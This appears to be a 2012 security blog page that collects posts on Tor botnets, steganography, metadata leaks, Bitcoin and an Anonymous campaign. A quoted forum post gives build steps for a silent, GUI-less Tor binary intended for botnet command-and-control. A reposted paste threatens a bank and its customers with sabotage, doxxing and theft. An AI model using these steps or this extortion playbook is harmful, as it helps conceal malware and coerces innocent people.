botNet infrastructure in Tor

gATO – was drawing a –What If– diagram: a botnet talking first to a level 1 clearWeb C&C server, and that server only talks to level 2 inside the Tor/i2p anonymized network. I included the infection C&C and the bot-distributor, separated back into the Tor/i2p network. This is all gleaned from information in HackBB in the onion network –/ Oh yeah, I've been playing with

steganography encryption/decryption

So the password to the picture is "password". I used ISteg to embed the message; this is a proof of concept that steganography is easy and a cool toy. Oh, my public key is on the site, you may need it because I encrypted the encrypted steganography picture that has a code... well, you get my drift... yeah, yeah

– gAtO oUt

message in picture – steganography  
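As an added example (not ISteg's code and not part of the original post), here is what "embed a message in a picture with a password" amounts to at the bit level: least-significant-bit steganography over a pixel buffer, with the payload XORed against a password-derived keystream and a short HMAC tag so that a wrong password is reported instead of silently returning garbage. The pixel buffer, the message and the password are constructed for the example; with Pillow the same kind of bytes would come from Image.open(path).convert("L").tobytes().

```python
"""LSB steganography over an 8-bit pixel buffer with a password-derived keystream.

Added example for this page; not ISteg's code, and it reads no image files.
PIXELS is a constructed stand-in for decoded greyscale pixel data.
"""
import hashlib
import hmac
import struct

MAGIC = b"STEG"          # marker so extract() can tell "no payload" from noise
HEADER_LEN = 12          # MAGIC(4) + length(4) + tag(4), one bit per pixel

# Constructed 4096-pixel buffer (about 500 bytes of message capacity).
PIXELS = bytes((i * 37 + 11) % 256 for i in range(4096))


def keystream(password: str, length: int) -> bytes:
    """SHA-256 in counter mode: H(pw||0) || H(pw||1) || ..., cut to length."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(password.encode() + struct.pack(">I", counter)).digest()
        counter += 1
    return bytes(out[:length])


def _xor(data: bytes, password: str) -> bytes:
    return bytes(a ^ b for a, b in zip(data, keystream(password, len(data))))


def _tag(message: bytes, password: str) -> bytes:
    """Truncated HMAC over the plaintext: lets extract() detect a wrong password."""
    return hmac.new(password.encode(), message, hashlib.sha256).digest()[:4]


def capacity(pixels: bytes) -> int:
    """Message bytes that fit at one LSB per pixel, after the header."""
    return len(pixels) // 8 - HEADER_LEN


def embed(pixels: bytes, message: bytes, password: str) -> bytes:
    """Copy of pixels whose LSBs carry MAGIC || len || tag || XOR(message, keystream)."""
    if len(message) > capacity(pixels):
        raise ValueError(f"message too long: capacity is {capacity(pixels)} bytes")
    payload = (MAGIC + struct.pack(">I", len(message))
               + _tag(message, password) + _xor(message, password))
    out = bytearray(pixels)
    i = 0
    for byte in payload:
        for shift in range(7, -1, -1):            # most significant bit first
            out[i] = (out[i] & 0xFE) | ((byte >> shift) & 1)
            i += 1
    return bytes(out)


def _read_lsbs(pixels: bytes, start: int, nbytes: int) -> bytes:
    """Reassemble nbytes from the LSBs of pixels[start : start + 8*nbytes]."""
    out = bytearray()
    for k in range(nbytes):
        byte = 0
        for j in range(8):
            byte = (byte << 1) | (pixels[start + 8 * k + j] & 1)
        out.append(byte)
    return bytes(out)


def extract(pixels: bytes, password: str) -> bytes:
    """Recover the message; ValueError if absent, corrupted, or wrong password."""
    if len(pixels) < 8 * HEADER_LEN:
        raise ValueError("buffer too small to hold a header")
    header = _read_lsbs(pixels, 0, HEADER_LEN)
    if header[:4] != MAGIC:
        raise ValueError("no LSB payload in this buffer")
    (length,) = struct.unpack(">I", header[4:8])
    if length > capacity(pixels):
        raise ValueError("length field exceeds buffer: corrupted payload")
    message = _xor(_read_lsbs(pixels, 8 * HEADER_LEN, length), password)
    if not hmac.compare_digest(_tag(message, password), header[8:12]):
        raise ValueError("wrong password or tampered payload")
    return message


if __name__ == "__main__":
    secret = b"the password to the picture is password"
    stego = embed(PIXELS, secret, "password")
    print(extract(stego, "password"))
    print(max(abs(a - b) for a, b in zip(PIXELS, stego)))   # LSB-only: never more than 1
```

The easy part cuts both ways: the payload is hidden in plain sight in the LSB plane, and a flat run of embedded bits is just as easy to spot statistically as it was to write. Encrypting before embedding, as above, hides the content of the message, not the existence of the channel.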


gAtO’s Twitter Weekly 2012-07-28


gAtO interview – Botnets in Tor -sI -Si

gAtO jUsT – finished an interview with Bill Donato from BotRevolt.com. I wanted to post this because these were good questions. My answers were a little lOcO gAtO but I tried anyway. Here is the interview; at the bottom I included a conversation about a Tor-controlled botnet I found in HackBB in onion land. All I can tell you is the code and the how-to are out there – gAtO oUt


LinkedIn: Mr Bill Donato has sent you a message.

Date: 7/26/2012

Subject: RE: Bot Revolt Blog

Hi Richard,
Here are 5 general questions we think our readers would find interesting. We greatly appreciate your feedback!

First, thank you Bill for this opportunity. I have 35 years in IT, and a little security goes with the territory, but I'm no expert. I'm retired so I have the freedom to say what I want and I have chosen to support Freedom of Speech in cyberspace. You can find my rants and rages about security at http://uscyberlabs.com/blog. I go by twitter @gAtOmAlO2 after my lionhearted cat named "gato". My 2 cents: "be a critical reader, thinker and cyber user". Trust but verify.

• We see a lot of cybercrime targeted at large companies, but how vulnerable is the average consumer in today’s cyber environment?

In today's economic climate cyber criminals see mass unemployment and use that to recruit shipping mules and money mules. Financial desperation and greed is a driving force in recruitment, and the FBI is well aware of this; a good money mule is hard to find and trust. Also, infection points for zombie computers to do the dirty work go up and up with every new exploit. Last, people don't know how much information they leak out. With metadata just from the pictures on Facebook a criminal can glean lots of information from the average Facebook update.

So to answer your question yes the average consumer needs to be very careful and have common sense. That lost Uncle from Nigeria did not leave you a billion dollars, trust me on this one.

• At the current level of cybercrime’s growth, if it is possible how long before the internet crashes?

Cyber crime is growing but CISPA is not the answer. PII (Personally Identifiable Information) that the government says it will not gather, just your shopping and search cyber habits, nothing identifiable until you type in the wrong keyword; then you're monitored. Then your footsteps in cyberspace will be monitored a bit more closely. The judicial system now added the cyber forensic psychologist that can produce "minority reports" (remember the movie, the thought police...). That's scary.

Where were you last Tuesday @ 9:37 PM... they know; we are being monitored by the good guys in today's Internet. It's normal to update my Facebook page or my LinkedIn profile, leaking data with the metadata from our pictures of our visit to the new office overseas. That can give criminals information for APT attacks.

As to the Internet crashing, I think it's just beginning. We have criminals after our data, government after our habits, and we have ourselves leaking information for everyone to know about me, me, me... but it's not crashing —> we have too many me..me..me..

• Cyber warfare is a hot topic, how will a cyber-war affect the countries average citizen?

Have you ever watched your daughter lose her cell phone 5 times in one year? 5 times, not one backup. The effects of a cyber kinetic event in the US will happen. I see open SCADA systems in the wild with no protection. Try and report this information; that's a joke and impossible. So many misconfigured SCADA systems, all running a Windows OS with no patch updates or management, so they become more vulnerable every day that they don't upgrade.

Oh, make that a tested update, because we (admin types) all stayed up late at night un-installing an upgrade for the Windows OS that made the payroll system (Oracle) not work, so NO paychecks...

In other words it will happen, because we have a pretty bad security system built into these devices and they are too expensive to replace. It's worth the risk from a financial side, so companies do the ROI (return on investment)... they did the cost analysis of an attack; they know they will get hacked... Power grid, YeaH Baby, and we have no backup. But we still come back. The average citizen has to ride it out; we have no choice in warfare.

• You talk on your website, uscyberlabs.com, about the rise of botnets running on the tor .onion network, is the tor network a threat to people who do not access it? If so how do users protect themselves?

Botnets in Tor, oh Yeah! I'm doing some research into botnets in the Tor black market and it's alive and kicking. The Tor hidden service and C&C servers go hand in hand. You can't find it, and it can't be found. We also have i2p as an up and coming secure anonymized network, so expect more and more from this area.

I included a post from the HackBB website in the onion network; this discussion is about "Tor-Controlled Botnets". I included the code, so in Tor there is talk from the hacker world on how-to guides to Tor & botnets, and it has a current timestamp.

It's not just the code, it's also the infrastructure design.

Go to Tor HackBB [1] – http://clsvtzwzdgzkjda7.onion/

• On your blog titled “Online Security Basic -should I use encryption” you give some great information. What encryption programs, methods or tips do your recommend for some of the less computer savvy users?

Well first of all, here [below] is my public key if you want to send me a message. I use FileVault and encrypt my hard drive, but I forgot my password – that's my story and I'm sticking to it..;) I use GnuPG. Since I'm not doing skunk work, and I'm not a spy, I try to go with open-source type programs; yes, they are a little harder to learn but I feel safer with the open aspect of it. In security we have a motto – trust but verify – I can verify these open source programs.

One thing that the average user needs to do is to make their privacy a key part in their cyber life. When you start down the security rabbit hole it’s an active step in your cyber lifestyle.

Privacy is a personal thing. When I'm looking for Preparation H I don't want Google, Yahoo or Amazon to know about this medical problem; it's kinda personal, private. But when I'm trolling on Huffington Post it's another world.



[1] Conversation online on the HackBB website about Tor botnets

[1] Tor-controlled botnet

Re: Tor-controlled botnet

by BotCoder » Fri May 18, 2012 5:50 pm

Good news! I compiled Tor from source and there is no GUI or tray icon if you skip the installer step.

Here is the info to compile from source (you can skip the installer part and build a silent one yourself):



## Instructions for building Tor with MinGW (http://www.mingw.org/)

Stage One: Download and Install MinGW.

Download mingw:

Download msys:

Download msysDTK:

Install MinGW, msysDTK, and MSYS in that order.

Make sure your PATH includes C:\MinGW\bin. You can verify this by right clicking on "My Computer", choose "Properties", choose "Advanced", choose "Environment Variables", select PATH.

Start MSYS (rxvt).

Create a directory called "tor-mingw".

Stage Two: Download, extract, compile openssl

Download openssl:

Extract openssl:

Copy the openssl tarball into the "tor-mingw" directory.
Type "cd tor-mingw/"
Type "tar zxf openssl-0.9.8l.tar.gz"
(Note: There are many symlink errors because Windows doesn't support symlinks. You can ignore these errors.)

Make openssl libraries:

Type "cd tor-mingw/openssl-0.9.8l/"
Type "./Configure -no-idea -no-rc5 -no-mdc2 mingw"
Edit Makefile and remove the "test:" and "tests:" sections.
Type "rm -rf ./test"
Type "cd crypto/"
Type "find ./ -name "*.h" -exec cp {} ../include/openssl/ \;"
Type "cd ../ssl/"
Type "find ./ -name "*.h" -exec cp {} ../include/openssl/ \;"
Type "cd .."
Type "cp *.h include/openssl/"
Type "find ./fips -type f -name "*.h" -exec cp {} include/openssl/ \;"
# The next steps can take up to 30 minutes to complete.
Type "make"
Type "make install"

Stage Three: Download, extract, compile zlib

Download zlib source:

Extract zlib:

Copy the zlib tarball into the "tor-mingw" directory.
Type "cd tor-mingw/"
Type "tar zxf zlib-1.2.3.tar.gz"

Make zlib.a:

Type "cd tor-mingw/zlib-1.2.3/"
Type "./configure"
Type "make"
Type "make install"

Stage Four: Download, extract, and compile libevent

Download the latest libevent release:

Copy the libevent tarball into the "tor-mingw" directory.
Type "cd tor-mingw"
Extract libevent.
Type "./configure --enable-static --disable-shared"
Type "make"
Type "make install"

Stage Five: Build Tor

Download the current Tor alpha release source code from https://torproject.org/download.html.

Copy the Tor tarball into the "tor-mingw" directory.

Extract Tor:

Type "tar zxf latest-tor-alpha.tar.gz"
Type "cd tor-<version>"
Type "./configure"
Type "make"

You now have a tor.exe in src/or/. This is Tor.
You now have a tor-resolve.exe in src/tools/.

Stage Six: Build the installer

Install the latest NSIS:

Run the package script in contrib:

From the Tor build directory above, run:

The resulting Tor installer executable is in ./win_tmp/.


gAtOmAlO Public Key-


Version: GnuPG/MacGPG2 v2.0.17 (Darwin)

Comment: GPGTools – http://gpgtools.org
Profiling a Corporation -metadata attack vector

gAtO sEe – that in today's world getting a corporate profile for an attack plan has become easy, and it is largely the corporation's own fault. This leads down the road to a ruined corporate reputation, stolen IP (intellectual property), lost competitive advantage and loss of data. Social activists, criminals, competitors and national governments all use the technology against the company to find unhidden access to its networks. How?

Metadata information leaks by the corporation and its employees. A study that retrieved the metadata from published company documents found that 71% of Forbes 2000 companies may be using vulnerable and out-of-date versions of Microsoft Office and Adobe software, and that the metadata lets an attacker identify —>

Usernames, email addresses, network details (such as internal share paths) and vulnerable software versions with which to plan an Advanced Persistent Threat (APT) attack.

Metadata in the documents your company distributes constitutes an information leak and can provide all kinds of information to an attacker. The high-tech sector publishes more documents across websites than any other industry. Something else: your employees on LinkedIn give away all kinds of information about your company and your plans, and even employment ads can tell a potential attacker what you are doing and let them design an APT geared towards that subject.

Remember, today's cyber attackers have support from lots of eyes and ears; like hacktivists they have many people who can scan your website and look for information that can help the attack. You have 3 different attack vectors to worry about today:

  • IP based attacks
  • Web-Software attacks
  • Information Attacks

Corporate America, take care of your metadata or it will bite you hard -gAtO oUt


BitCoin 101


Forget most things you’ve heard.  People discover BitCoin in a variety of ways, but usually pick up some sort of misconception like “BitCoin gives free money to people with computers” or “in order to use BitCoin I have to use a program that wastes electricity for nothing” along the way.  Here is a good summary to help you understand BitCoin in general, by focussing on what BitCoin is and what problem it solves.  These two things are not typically well explained on most websites, and it is difficult to appreciate just how effective a technology BitCoin is until they are understood.

What BitCoin is:  An agreement amongst a community of people to use 21 million secure mathematical tokens–“bitcoins”–as money, like traditional African and Asian societies used the money cowry.  Unlike the money cowry:

  • there will never be more bitcoins
  • they are impossible to counterfeit
  • they can be divided into as small of pieces as you want
  • and they can be transferred instantly across great distances via a digital connection such as the internet.

This is accomplished by the use of public-key cryptography. Instead of simply being "sent", coins have to be cryptographically signed over from one entity to another, essentially putting a lock and key on each token, so that bitcoins can be securely backed up in multiple places and copying a wallet doesn't increase the amount you own.

Because bitcoins are given their value by the community, they don’t need to be accepted by anyone else or backed by any authority to succeed.

They are like a local currency except much, much more effective and local to the whole world.  As an example of how effective the community is at “backing” the bitcoin: on April 4th 2011 30,000 bitcoins were abruptly sold on the largest BitCoin exchange, consuming nearly all “buy” offers on the order book and dropping the price by nearly 1/3.  But within a couple of days, the price on the exchange had fully rebounded and bitcoins were again trading at good volumes, with large “buy” offers slowly replacing the ones consumed by the trades.  The ability of such a small economy (there were only 5 million out of the total 21 million bitcoins circulating then, or about 3.75 million USD worth at then-current exchange rates) to absorb such a large sell-off without crashing shows that bitcoins were already working beautifully.

What problem BitCoin solves:  Mathematically, the specific implementation of the bitcoin protocol solves the problem of “how to do all of the above without trusting anyone“.  If that sounds amazing, it should!

Normally a local currency has to trust all kinds of people for it to be able to work.

So does a national currency.  And in both cases, that trust is often abused.  But with BitCoin, there’s no one person who can abuse the system.  Nobody can print more money, nobody can re-use the coins simply by making a copy, and nobody can use anyone else’s coins without having direct access to their keys.  People who break its mathematical “rules” simply end up creating a whole different system incompatible with the first.  As long as these rules are followed by someone, the only way BitCoin can fail is for everyone to stop using it.

This marvelous quality of not having to trust anyone is achieved in two ways.  First, through the use of cutting-edge cryptography.

Cryptography ensures that only the holder of the private key controlling some bitcoins has the authority to spend them. The signature scheme BitCoin uses (ECDSA) is the same kind of public-key cryptography that protects online banking, so a break in it would affect far more than BitCoin, and the scheme can be upgraded by the community if that were ever to start happening. It's as if each banknote in your pocket had a combination lock on it that couldn't be removed without destroying the bill itself.

But the second way of securing the system, called the blockchain, is where the real magic happens.  The blockchain is a single, authoritative record of confirmed transactions which is stored on the peer to peer bitcoin network.

Even with top-notch digital signatures, if there were no shared registry to show that certain bitcoins had already been "paid" to someone else, you could sign over the same coins to multiple people in what's called a double-spend attack, like writing cheques for more money than you have in your account. Normally this is prevented by a central authority, the bank, which keeps track of all the cheques you write and makes sure they don't exceed the amount of money you have.

Even so, most people won’t accept a cheque from you unless they really trust you, and the bank has to spend a lot of money physically protecting those central records, whether they are kept in a physical or digital form.  Not to mention, sometimes a bank employee can abuse their position of trust.  And, in traditional banking, the bank itself doesn’t have to follow the rules you do–it can lend out more money than it actually has.

The blockchain fixes all these problems by creating a single master registry of the already-cryptographically-secured bitcoin transfers, verifying them and locking them down in a highly competitive market called mining.  

In return for this critical role, the BitCoin community rewards miners with a set amount of bitcoins per block, taken from the original limited quantity on a pre-agreed schedule. As that original amount gradually runs out, this reward will be replaced by fees paid to prioritise one transaction over another, again in a highly competitive market to ensure the lowest possible cost. The transactions are verified and locked in by the computational work of mining in a very special way: anyone who wants to change the official record has to redo the proof of work of the altered block and of every block after it, faster than the rest of the network keeps extending the chain, which in practice means controlling more hashing power than all honest miners combined.
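To make the two mechanisms concrete, here is a toy chain in Python, added for this page and not Bitcoin's own code: blocks are mined with a proof of work, validation replays every block against an unspent-output set so the same coins cannot be spent twice, and editing an already-mined transaction is caught because the header's commitment to the transactions no longer matches. The simplifications are labelled in the code: ownership is a bare name rather than an ECDSA signature, the transaction commitment is a hash over concatenated ids rather than a Merkle tree, coinbase transactions carry the block height so their ids are unique, and the difficulty is a few bits so the blocks mine in milliseconds.

```python
"""Toy blockchain: proof of work plus a UTXO set.

Added example for this page, not Bitcoin's code. Labelled simplifications:
no signatures (an output's owner is just a name), a flat hash instead of a
Merkle tree, and a tiny DIFFICULTY so it runs instantly.
"""
import copy
import hashlib
import json

DIFFICULTY = 12          # leading zero bits required of a block hash (toy value)
REWARD = 50              # coinbase subsidy per block; fees are ignored here
GENESIS_PREV = "0" * 64


def sha256d(data: bytes) -> str:
    """Bitcoin-style double SHA-256, hex encoded."""
    return hashlib.sha256(hashlib.sha256(data).digest()).hexdigest()


def canonical(obj) -> bytes:
    """Deterministic serialisation so hashes are reproducible."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def tx_id(tx: dict) -> str:
    return sha256d(canonical(tx))


def tx_root(txs: list) -> str:
    """Commitment to the block's transactions (stand-in for a Merkle root)."""
    return sha256d("".join(tx_id(t) for t in txs).encode())


def meets_target(block_hash: str) -> bool:
    return int(block_hash, 16) >> (256 - DIFFICULTY) == 0


def mine(prev_hash: str, txs: list) -> dict:
    """Search for a nonce whose header hash meets the target: the 'work'."""
    header = {"prev": prev_hash, "root": tx_root(txs), "nonce": 0}
    while True:
        h = sha256d(canonical(header))
        if meets_target(h):
            return {"header": header, "hash": h, "txs": txs}
        header["nonce"] += 1


def coinbase(height: int, owner: str) -> dict:
    """Block subsidy; the height makes every coinbase id distinct."""
    return {"height": height, "inputs": [], "outputs": [[owner, REWARD]]}


def validate_chain(chain: list) -> tuple:
    """Replay the chain from genesis: (True, 'ok') or (False, reason).

    Each input must name an output still present in the UTXO set, and that
    output is removed when spent, so the same coins cannot be signed over twice."""
    utxo = {}                                  # (txid, index) -> [owner, amount]
    prev = GENESIS_PREV
    for height, block in enumerate(chain):
        hdr = block["header"]
        if hdr["prev"] != prev:
            return False, f"block {height}: does not extend previous block"
        if sha256d(canonical(hdr)) != block["hash"] or not meets_target(block["hash"]):
            return False, f"block {height}: invalid proof of work"
        if hdr["root"] != tx_root(block["txs"]):
            return False, f"block {height}: transactions altered after mining"
        for n, tx in enumerate(block["txs"]):
            out_total = sum(amt for _, amt in tx["outputs"])
            if n == 0:                         # first tx is the coinbase
                if tx["inputs"] or out_total != REWARD:
                    return False, f"block {height}: bad coinbase"
            else:
                in_total = 0
                for ref in tx["inputs"]:
                    key = tuple(ref)
                    if key not in utxo:
                        return False, f"block {height} tx {n}: input {key} unknown or already spent"
                    in_total += utxo.pop(key)[1]
                if out_total > in_total:
                    return False, f"block {height} tx {n}: outputs exceed inputs"
            tid = tx_id(tx)
            for idx, (owner, amt) in enumerate(tx["outputs"]):
                utxo[(tid, idx)] = [owner, amt]
        prev = block["hash"]
    return True, "ok"


def build_demo_chain() -> list:
    """Two valid blocks: alice earns a subsidy, then pays carol 30 and keeps 20."""
    cb1 = coinbase(0, "alice")
    b1 = mine(GENESIS_PREV, [cb1])
    spend = {"inputs": [[tx_id(cb1), 0]], "outputs": [["carol", 30], ["alice", 20]]}
    b2 = mine(b1["hash"], [coinbase(1, "bob"), spend])
    return [b1, b2]


def double_spend_attempt(chain: list) -> list:
    """A properly mined third block in which alice spends block 0's coins again."""
    cb1 = chain[0]["txs"][0]
    again = {"inputs": [[tx_id(cb1), 0]], "outputs": [["dave", 50]]}
    return chain + [mine(chain[-1]["hash"], [coinbase(2, "bob"), again])]


def tamper_attempt(chain: list) -> list:
    """Edit a mined transaction in place; the header's root no longer matches."""
    forged = copy.deepcopy(chain)
    forged[1]["txs"][1]["outputs"][0][1] = 49      # carol's 30 becomes 49
    return forged


if __name__ == "__main__":
    chain = build_demo_chain()
    print(validate_chain(chain))
    print(validate_chain(double_spend_attempt(chain)))
    print(validate_chain(tamper_attempt(chain)))
```

Note that the double-spend block carries a valid proof of work: work alone proves nothing about the transactions, and every node still replays them against its own UTXO set before accepting the block. The tampered chain fails for the other reason; to make the edit stick, the forger would have to re-mine block 1 and every block after it, which is the cost the text refers to.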

In conclusion: All this mathematical technology may be a bit of a mouthful, but what it means in practice is that BitCoin works much like cash. Confirmed bitcoin transactions are irreversible by design, unlike credit cards or PayPal, where chargebacks can invalidate a payment that has already been made. And there are no middlemen. Transactions are completed directly between the sender and the receiver via the peer to peer network.

Because of BitCoin's design, the rules are enforced by every node that validates blocks, so the network stays secure regardless of where or how you process your own transactions. Which is incredible: no one had built a working system this way before.

All previous monetary systems have relied on trusting somebody, whether it was the king, town hall, the federal reserve, or banks.  BitCoin doesn’t.  

It's guaranteed instead by mathematics and by the economic incentive for miners to follow the rules, and that's why it has everyone from technologists to economists very excited.

More –> https://en.bitcoin.it/wiki/Main_Page


Hacktivist ‘Unlike Us’ Video

This was inevitable. London crew Hacktivist, whose unique, rap-driven take on tech metal has been heralded as the arrival of 'rap djent' (yes, really), has unveiled their new video Unlike Us.


Anon iWot Team (Internet War On Terror)

gAtO see – a new twist on Anonymous. They are going after the money trail of terrorists; Dahabshiil International Funds Transfer is their target. This team calls itself iWot, "Internet War On Terror". Now the reason gAtO looked carefully at this group is because #1 they are going after bankers –lulz– and #2 this is a well thought out plan: first show they have the real information before the big data dump. But there is more to this first announcement –

I kind of followed the data and when I saw – BAYD0009016 MOHAMED MURSAL SHEIK A/RAHMAN – this is Omar Abdel-Rahman, also known as the Blind Sheikh, famed for the 1993 World Trade Center bombing, and tied to — (Somali: Maxamed Mursal Sheikh Cabduraxman) a former deputy district commissioner and Minister of National Assets and Procurement of Somalia – Well, this posting has got my attention.

This list also has CHILDREN'S VILLAGES of SOMALIA and some other innocent-looking people. After looking at some of the names and emails and googling a few —> this one is real; there are some real terrorists on this list. These guys have a little class and I like that in a hacktivist. I will have to keep an eye out for this group; they have interesting lulz -gAtO oUt

This new paste – http://pastebin.com/VqrSV5bG


Pastebin: by a guest on Jul 19th, 2012 | syntax: none | size: 11.12 KB | expires: never

After years of offensive hacking against many companies, governments, etc, we [Anonymous], decided to share data related to an internal confidential project from multiple l33t hackers worldwide. We called that “iWot“, meaning “Internet War On Terror“.

Though we will never forget what happened with Megaupload, Pirate Bay, Sopa, friends, etc, our sub-branch of the Anonymous was created with trusted hackers, to follow a specific goal. This email will be the first from us. Thanks to spread our words

We officially declare War on Terror. This is a call for actions of monitoring and/or destruction of companies and institutions that do work with terrorists, rogue countries, etc.

We already broke the security of multiple networks on earth. Each time we will be able to control them, and to steal data, we will then publish our documents on the net, or share them directly to people involved with Newspapers, Justice, etc, worldwide. Some documents, about some banks working with rogue countries, were already shared to some email addresses. And we are quite happy to see that the truth is on its way.. sometimes..

As some of us already explained, we are not a terrorist organization. It's just that we are fed-up with the fact that our society is losing time. So we just decided to speed-up actions against terrorists and their friends. We will first try to eradicate the sources of terrorist financing. It is not possible to know at this time the precise scope or the duration of our actions to counter terrorist threats linked to Internet.

Today, as a proof of concept, we will share information about a really evil bank, hiding ugly activities with terrorists. It’s called “Dahabshiil“, an international funds transfer company. Their networks have been broken by different hackers teams for many years. And it’s time for us to share information here in this mail.

Thanks to Wikileaks, secret documents related to Guantanamo detainees publicly explained part of the truth about Dahabshiil. A veteran extremist and a probable associate of Usama Bin Laden, provided direct financial support to Al-Qaeda, Al-Wafa and other terrorist and terrorist support entities through the Somalia-based company Dahabshiil. This bank is currently helping Al-Qaeda, including members of Al-Shabaab.

Despite the fact that the CEO of Dahabshiil tried to get rid of some people, and sometimes people from its own family, this will not be enough for us. We have stolen many many many documents from Dahabshiil. We have destroyed many workstations in Australia, Kenya, USA, UK, Sweden, Somalia, Dubai, Djibouti, etc. We can transfer money from accounts to accounts, despite the stupid security with tokens, passwords, etc. We have modified Windows kernel on many servers and workstations. We have added different kind of cyber-bombs hidden on many workstations and servers. We have powned switches, routers, firewalls, satellite stuff from Telco, etc.

As Dahabshiil members might think we are lying, we have to share data. Feel free to download and copy the data before everything get destroyed, as it’s totally illegal. And now, if Dahabshiil members were unable to understand why the network sometimes crashed, the computers sometimes died, data from internal servers sometimes died, etc, do not search. It was just our actions against you, with people from our team. As an example, we recently destroyed data on the internal LAN in Somaliland, from the Dahabshiil Headquarters (Hargeisa, etc). That’s why you guys, lost Gigs of internal sensitive data on main servers like \\Dahabshiil7, \\Dahabshiil6…

By the way, we also found out that many employees were looking at facebook stuff, personal email, and tons of incredible hardcore porn web sites especially in countries from the Arabian Peninsula, and from the bank (not at home). Also, the password of the account Administrator of the internal LAN in Somaliland, was mainly “Dahab1234”. Awesome. This is how they protect data of their customers. Quite a serious bank. As we have remote 0days against some of their tools, we easily took the control of any workstations there. Then we bounced and bounced, in order to explore this bank. Hopefully, we were a huge number of hackers at the same time, and during months, which helped at stealing sensitive data, spying on end-users and banking transactions, etc. After months and months of fun against these guys who support Terror on earth, we just decided that it was time to destroy them.

This was just the beginning… and just a proof. So from now, dear Dahabshiil members and customers, you can expect a global internal destruction in less than 2 months. You can keep on asking external consultants, even in Europe, about how to install Antivirus, Firewalls, NAC, IPS, Waf, etc. But we will still destroy your networks, steal your data, and sometimes share internal stuff to the public. This is called a sabotage… We had first to be sure that you could not get rid of our offensive tools. That’s why we used two layers of tools. Skilled stuff (with kernel 0dd modifications, etc), and easy tricks (to annoy and to play with your network/data). Now it’s ready. The bombs will kill your networks and your data in less than 2 months. You can also backup the poor data that you still have, but we also infected random Office/PDF documents left, so you’ll just backup some of our bombs, and your network will still die.

If you want us to immediately stop this cyber-sabotage, it's quite easy. We just ask you to stop lying, to recognize your help with Somalia terror, and to officially change your behavior. We need a public message from you, as a proof. As you might have seen, public excuses of far bigger banks than Dahabshiil, were done recently, from people who worked with rogue countries, etc. So, we just ask you to do the same and to change. We will monitor you, as we already made these years. You have 2 months. Maximum. If we see that you are still asking for help against us, to your supposed-to-be IT Security consultants (UK, etc), or if we see that you are trying to clean our stuff in your kernels, etc, we will then launch the cyber-bombs before the 2 months. You don't have the choice. You have to submit. You have to leave this world of hate, this world of slaughters, this world of killers, and to leave terrorists behind you.

Of course you needed money. Of course most of your employees/customers are not terrorists. Of course most of your employees/customers didn’t know your links with Terror. Of course someone else would have done this in your place. Of course our offensive actions are totally illegal (like yours when you support Terror). But according to us, these reasons are not good reasons. The countdown is already running. It’s too late. You have the choice between living, or dying with honors in the family of people who helped terrorists. You will be our first public example of cyber-destruction, as others already changed their minds. Be smart. Choose life.

And now a message to Dahabshiil customers: if you have money in this bank, if you are a customer of this bank, if you use this bank to transfer money from a country to another, and even if you are not a terrorist, we will let you less than 2 months before we either publish your personal information (passport, ID card, postal address, phone, email, etc), or we destroy your account by moving your money elsewhere, which will not be complex. As an example, we already shared this kind of information, as a proof of capability. Less than 2 months. After that, don't cry if you lost your money at Dahabshiil, even if they told you that everything was under control (lulz), that they were able to clean their systems (lulz), etc. So, just take your money out of Dahabshiil now (!), and leave them behind you, before the destruction of this unofficial financial support for terrorists. First casualty of war is innocence. Be smart. Choose life.

And now a message to people in the same situation as Dahabshiil: If you are working with terrorists, if you are helping them, if you are linked to them, we will find you, and you will also be destroyed by our cyber-team, sooner or later. There is no place for you on earth. No place for you on Internet. No place for hate. Make love. Make kids. Be smart. Choose life.

We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us

Anon iWot Team (Internet War On Terror)

Bonus: This is really sad to see that some companies helped Dahabshiil after our intrusions (sometimes from Europe, etc). We won’t reveal the names of these IT Security workers, cause we understood that they just wanted to make money. But, as a last advice for them and their family, thanks to think twice the next time you will help Dahabshiil and terrorists. You are helping people who helped Al-Qaeda, like many other unscrupulous Islamic banks that helped at laundering kind of donations. We know you. You are not anon anymore. *We are Anonymous.*

Credits: though we will hide the identity of the people who helped us, we will at least share our thanks to their organizations, for those who accepted it. So, many many thanks to people from Iomart (!), from Vizada and from Somtel. Some of them accepted to share technical stuff (passwords, remote access, etc) as they do follow our spirit and our values against Terror. *We are legion.*

Contacts: no need to answer to this email address, as it's not ours. If you want to meet us, as always we'll be at Defcon soon, and we hope that there will be a special prize for Dahabshiil, though it's a bit late to propose them to the Pwnie Awards. We do believe that being an international bank, with really lame security, fake official answers, and real links with terrorists to kill people in Africa, Europe or America (Al-Qaeda), should bring them to a special prize. They deserve it. *We do not forget.*

Future: if you want to participate, just share your thoughts or ideas of targets on Internet with the official related proofs showing links with terrorists. Like any skilled hackers, we can have remote access anywhere on earth (gov, telco, comp, etc) as the current IT Security community is just selling dreams and fake products. If you like our values, thanks to support Anonymous iWot (internet War on terror) and put tags like #anoniwot2012 so that we can find your list of targets, your messages, your help, your ideas, etc. You cannot contact us directly, so, please shout enough so that we can hear you. You can just share message to our teams on public spaces, and we’ll read them. Before that, if you enjoyed our specific actions against terrorists in Somalia, thanks to really show your support about this Somaleaks operation, with the tag #somaleaks and just wait, as many other places might burn sooner or later. *Expect us.* –DATA Dump  http://www.animegist.com/old//Somaleaks/


gAtO’s Twitter Weekly 2012-07-21


Fingerprint Tor or Government Anonymized Network

How To  Fingerprint Anonymized Network visiting your website

gAtO hAs – been learning about the Tor .onion network and one thing I wanted to understand was how China, Iran and Syria block the Onion Router (OR). / Fingerprint profile – I have read in the Tor wiki about the Tor signal simulating a Skype fingerprint to hide in the clutter of the web. So how do I figure this out? OK, with Wireshark I can capture the packets and check out the signature and fingerprint of a Tor anonymized network. This is one way.

Another way – just check out your website statistics and look for anyone that visited your site that does not have a country code. From observation of my site uscyberlabs.com I have found a pattern lately: most "no country flag" entries indicate a Tor OR or a private anonymized network. Not all of them are Tor, so some of the others are the most interesting because they are anonymized but not Tor; I2P maybe, government networks –mAyBe -sI -nO gAtO is a gAtO, let's check this out

I have a few SEO packages on my site to check out the back-end statistics of the site. These give you information about your web visitors like the referring site they came from, the OS, the platform and the country they came from, their geo-location. One of the things that Tor does for you is prevent people from knowing your IP / geo-location. So guess what??? People have been visiting my site using not just Tor networks – c00l b3ans – but what else can I find out about these other non-Tor relays? So I started digging around, and this is what I found about some of these exit-relays… gAtO wArNiNg – I have to hold back some information about government anonymized networks due to privacy and possible vulnerabilities.

